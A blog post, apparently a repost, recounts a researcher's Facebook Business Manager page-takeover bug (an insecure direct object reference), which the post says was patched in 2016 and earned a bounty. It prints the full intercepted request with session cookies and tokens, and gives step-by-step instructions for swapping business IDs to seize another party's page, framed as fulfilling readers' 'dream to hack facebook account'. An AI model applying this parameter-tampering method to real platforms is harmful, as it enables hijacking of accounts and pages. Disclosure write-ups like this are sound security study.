Seems like SECURE is not a word that the world’s biggest conglomerates can even say. As we all dream to hack facebook account and be able to use others account as themselves.
Apparantly an Indian guy has done it. His name is Arun Sureshkumar. He recently found a bug in facebook and got a reward of $16000. That’s one of few times i call it big bounty. He had earlier also got rewarded by facebook for his bug findings. Lets see how he did that.
As mentioned on his website :
How To Exploit:
Prerequisite:
- Facebook Business Account (2 no’s).
One as own business and other can be any test account business.
Here i use my account business id as : 907970555981524
And another one , any partner id so i will choose it from my test account. 991079870975788
- Add a partner using my own business and just intercept the request.
Then he used Burp Proxy to intercept the request:
POST /business_share/asset_to_agency/?dpr=2 HTTP/1.1
Host: business.facebook.com
Connection: close
Content-Length: 436
Origin: https://business.facebook.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://business.facebook.com/settings/pages/536195393199075?business_id=907970555981524
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB; sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n; lu=gh2GPBnmZY1B1j_7J0Zi3nAA; c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837; fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I; csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2; presence=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC; act=1472469233458%2F6
parent_business_id=907970555981524&agency_id=991079870975788&asset_id=536195393199075&role=MANAGER&__user=100000771680694&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8SmqVUzxeUW4ohAxWdwSDBzovU-eBCy8b48xicx2aGewzwEx2qEN4yECcKbBy9onwFwHCBxungXKdAw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=265817211176711044972851091025865817184521026870494511081&__rev=2530733
Changed asset id to the page you want to hack. and also interchange the parent_business_id with agency_id.
ie,
parent_business_id= 991079870975788
agency_id= 907970555981524
asset_id =190313461381022
role= MANAGER
Next: Resend the request.
Request send successfully. Page added to the Facebook Business Manager of the attacker with permission role Manager.
Assigned him as the admin of the page , which was added by the exploit.
Browse the page using the Facebook Business Manager and do desire amount of things!.
What Vulnerability Is It?
Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.
Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks.
Bug Status
Sorry but the bug is successfully patched by facebook. He reported it on 29th Aug’16 and he got the bounty awarded on 16th Sept’16.
Reference
What better than his own website
http://arunsureshkumar.me/index.php/2016/09/16/facebook-page-takeover-zero-day-vulnerability/
Init1India 